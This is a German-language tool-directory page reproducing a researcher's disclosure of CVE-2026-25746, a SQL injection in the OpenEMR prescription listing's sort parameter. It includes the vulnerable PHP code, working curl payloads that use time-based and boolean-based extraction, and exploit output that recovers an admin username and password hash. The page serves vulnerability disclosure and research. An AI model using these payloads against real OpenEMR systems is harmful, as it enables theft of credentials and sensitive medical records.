Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-25746_SqlInjectionVulnerabilityOpenEMR7.0.4 — CVE-2026-25746 - SQL-Injection-Schwachstelle in OpenEMR <8.0.0 | Kitploit
Tools/GitHubGitHub/chrissub08/cve-2026-25746_sqlinjectionvulnerabilityopenemr7.0.4
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubchrissub08/cve-2026-25746_sqlinjectionvulnerabilityopenemr7.0.4

CVE-2026-25746_SqlInjectionVulnerabilityOpenEMR7.0.4

CVE-2026-25746 - SQL-Injection-Schwachstelle in OpenEMR <8.0.0

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 MonatenNoch nicht geprüft

CVE-2026-25746 - SQL-Injection-Schwachstelle in OpenEMR <8.0.0

Schwachstelle CWE-89

Unsachgemäße Neutralisierung von Sonderelementen in einem SQL-Befehl ('SQL Injection') Das Produkt konstruiert einen SQL-Befehl vollständig oder teilweise mithilfe von extern beeinflusster Eingabe aus einer vorgelagerten Komponente, neutralisiert jedoch spezielle Elemente, die den beabsichtigten SQL-Befehl ändern könnten, nicht oder nur falsch, wenn er an eine nachgelagerte Komponente gesendet wird. Ohne ausreichende Entfernung oder Quotierung der SQL-Syntax in benutzerkontrollierten Eingaben kann die erzeugte SQL-Abfrage dazu führen, dass diese Eingaben als SQL statt als gewöhnliche Benutzerdaten interpretiert werden. Weitere Informationen bei MITRE.

Zusammenfassung

OpenEMR <8.0.0 enthält eine SQL-Injection-Schwachstelle in der Rezeptverwaltung, die von authentifizierten Angreifern ausgenutzt werden kann. Die Schwachstelle besteht aufgrund unzureichender Eingabevalidierung in der Funktionalität zur Auflistung von Rezepten.

Details

Die Schwachstelle tritt in der Funktionalität zur Auflistung von Rezepten auf, bei der eine vom Benutzer bereitgestellte Eingabe im sort-Parameter ohne ordnungsgemäße Bereinigung direkt in SQL-Abfragen eingefügt wird. Dadurch können Angreifer schädlichen SQL-Code einschleusen.

Die Schwachstelle betrifft die folgenden Dateien:

  • \openemr\library\classes\Prescription.class.php Zeile 1148 in der Funktion prescriptions_factory
  • \controllers\C_Prescription.class.php Zeile 180 in der Funktion list_action
  • \openemr\controller.php Zeile 6

Controller-Datei, die über den URL-Pfad aufgerufen wird

root@kitploit:~
$controller = new Controller();
echo $controller->act($_GET);

Methode act des Controllers:

root@kitploit:~
        $args = array_reverse(array_keys($qarray));
        $c_name = preg_replace("/[^A-Za-z0-9_]/", "", (string) array_pop($args));
...
        $c_action = preg_replace("/[^A-Za-z0-9_]/", "", (string) array_pop($args));
...
        $obj_name = "C_" . $c_name;
        $c_obj = new $obj_name();
...
        foreach ($args as $arg) {
            $arg = preg_replace("/[^A-Za-z0-9_]/", "", (string) $arg);
            if (empty($qarray[$arg]) && $qarray[$arg] != "0") {
                $args_array[] = null;
            } else {
                $args_array[] = $qarray[$arg];
            }
        }
...
        if (is_callable([&$c_obj, $c_action . "_action"]) && method_exists($c_obj, $c_action . "_action")) {
            $output .=  $c_obj->{$c_action . "_action"}(...$args_array);
        }

Methode list_action von C_Prescription

root@kitploit:~
    function list_action($id, $sort = "", $printPrescriptionId = null)
    {
        if (empty($id)) {
            $this->function_argument_error();
            exit;
        }

        if (!empty($sort)) {
            $this->assign("prescriptions", Prescription::prescriptions_factory($id, $sort));
        }

Prescription-Methode prescriptions_factory mit der Schwachstelle

root@kitploit:~
    static function prescriptions_factory(
        $patient_id,
        $order_by = "active DESC, date_modified DESC, date_added DESC"
    ) {

        $prescriptions = [];
        $p = new Prescription();
        $sql = "SELECT id FROM " . escape_table_name($p->_table) . " WHERE patient_id = ? " .
                "ORDER BY " . add_escape_custom($order_by);
        $results = sqlQ($sql, [$patient_id]);
        while ($row = sqlFetchArray($results)) {
            $prescriptions[] = new Prescription($row['id']);
        }

        return $prescriptions;
    }

Berechtigungen

root@kitploit:~
        if ((array_key_first($qarray) ?? '') == 'prescription') {                                                                                              
            if (!AclMain::aclCheckCore('patients', 'rx')) {                                                                                                    
                echo (new TwigContainer(null, $GLOBALS['kernel']))->getTwig()->render('core/unauthorized.html.twig', ['pageTitle' => xl("Prescriptions")]);    
                exit;                                                                                                                                          
            }                                                                                                                                                  
        }

Für patients ist die ACL rx erforderlich. Dies sind Standardberechtigungen und keine erweiterten Rechte.

SQL-Injection

root@kitploit:~
SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY <injection>

PoC

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=619d6abca06d21fe709779f348c0a5de" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort="'                  
SQL Statement failed on preparation: SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY \&quot;'<br>
<h2><font color='red'>Query Error</font></h2><p><font color='red'>ERROR:</font> query failed: SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY \"</p><p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\"' at line 1</font></p><br />/var/www/localhost/htdocs/openemr/library/classes/Prescription.class.php at 1149:sqlQ<br />/var/www/localhost/htdocs/openemr/controllers/C_Prescription.class.php at 180:prescriptions_factory(1,")<br />/var/www/localhost/htdocs/openemr/library/classes/Controller.class.php at 157:list_action(1,")<br />/var/www/localhost/htdocs/openemr/controller.php at 6:act(Array)

┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=619d6abca06d21fe709779f348c0a5de" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort=(SELECT%201)'

┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=619d6abca06d21fe709779f348c0a5de" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort=(SELECT%20SLEEP(5))'

┌──(kali㉿kali)-[~]
└─$ curl -b "OpenEMR=5d884df35b6ff2fddf12d83da5095ae8" -k 'https://172.18.0.3/controller.php?prescription=&list=&id=1&sort=(SELECT%20((ASCII(SUBSTRING(username,1,1))%20DIV%20128)MOD%202)%20FROM%20users%20LIMIT%201)'

Es gibt mehrere Techniken, um die Schwachstelle auszunutzen; eine davon ist ein boolean-basierter Angriff, der mithilfe des letzten Payloads funktioniert:

root@kitploit:~
SELECT id FROM prescriptions WHERE patient_id = ? ORDER BY (SELECT ((ASCII(SUBSTRING(username,1,1)) DIV 64)MOD 2) FROM users LIMIT 1)

Exploit

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ python3 exploit.py 172.18.0.3 b2b9f1cc76b47f8f13cc1f707baa0a64 users_secure --columns username password password_history1 password_history2 password_history3 password_history4
[+] Using patient_id=1
[+] Reference checksum (1): 604da4e5e2149a31fc68530bad701666942f600f
[+] Reference checksum (0): 66cfdfc2ad847a919672c75651b43749e1a5f38c
[#] Row count for table: users_secure 1
[#] String length: users_secure.username 0 5
[>] Character recovered: a
[>] Character recovered: d
[>] Character recovered: m
[>] Character recovered: i
[>] Character recovered: n
[+] Extracted string: ascii users_secure username 0 admin
[#] String length: users_secure.password 0 60
[>] Character recovered: $
[>] Character recovered: 2
[>] Character recovered: y
[>] Character recovered: $
[>] Character recovered: 1
[>] Character recovered: 2
[>] Character recovered: $
[>] Character recovered: g
[>] Character recovered: 4
[>] Character recovered: T
[>] Character recovered: y
[>] Character recovered: s
[>] Character recovered: 1
[>] Character recovered: l
[>] Character recovered: x
[>] Character recovered: A
[>] Character recovered: f
[>] Character recovered: t
[>] Character recovered: B
[>] Character recovered: I
[>] Character recovered: u
[>] Character recovered: x
[>] Character recovered: y
[>] Character recovered: w
[>] Character recovered: o
[>] Character recovered: 5
[>] Character recovered: L
[>] Character recovered: z
[>] Character recovered: e
[>] Character recovered: V
[>] Character recovered: 7
[>] Character recovered: W
[>] Character recovered: 7
[>] Character recovered: a
[>] Character recovered: L
[>] Character recovered: B
[>] Character recovered: z
[>] Character recovered: O
[>] Character recovered: X
[>] Character recovered: g
[>] Character recovered: a
[>] Character recovered: C
[>] Character recovered: g
[>] Character recovered: U
[>] Character recovered: e
[>] Character recovered: v
[>] Character recovered: Z
[>] Character recovered: x
[>] Character recovered: A
[>] Character recovered: Y
[>] Character recovered: Q
[>] Character recovered: a
[>] Character recovered: X
[>] Character recovered: 0
[>] Character recovered: c
[>] Character recovered: y
[>] Character recovered: c
[>] Character recovered: 2
[>] Character recovered: i
[>] Character recovered: O
[+] Extracted string: ascii users_secure password 0 $2y$12$g4Tys1lxAftBIuxywo5LzeV7W7aLBzOXgaCgUevZxAYQaX0cyc2iO
[#] String length: users_secure.password_history1 0 0
[#] String length: users_secure.password_history2 0 0
[#] String length: users_secure.password_history3 0 0
[#] String length: users_secure.password_history4 0 0

┌──(kali㉿kali)-[~]
└─$ 

Auswirkungen

  • Unbefugter Zugriff auf Datenbankinformationen
  • Mögliche Datenschutzverletzung sensibler medizinischer Informationen
  • Serverseitige Codeausführung (in einigen Fällen)
  • Kompromittierung der Datenbank

Danksagungen

  • Forscher: Christophe SUBLET
  • Organisation: Grenoble INP - Esisar, UGA
  • Projekt: CyberSkills, Orion

Links

https://www.cve.org/CVERecord?id=CVE-2026-25746

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
Bitte zitieren Sie unser Paper: https://github.com/ChrisSub08/CVE-2026-25746_SqlInjectionVulnerabilityOpenEMR7.0.4

Tool herunterladen